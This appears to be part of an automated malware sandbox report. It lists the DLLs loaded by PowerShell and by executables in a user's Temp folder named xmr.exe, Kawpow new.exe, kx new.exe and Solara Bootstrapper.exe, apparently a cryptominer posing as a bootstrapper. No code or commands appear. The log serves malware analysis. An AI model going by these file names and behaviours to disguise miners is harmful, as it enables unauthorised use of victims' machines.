Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
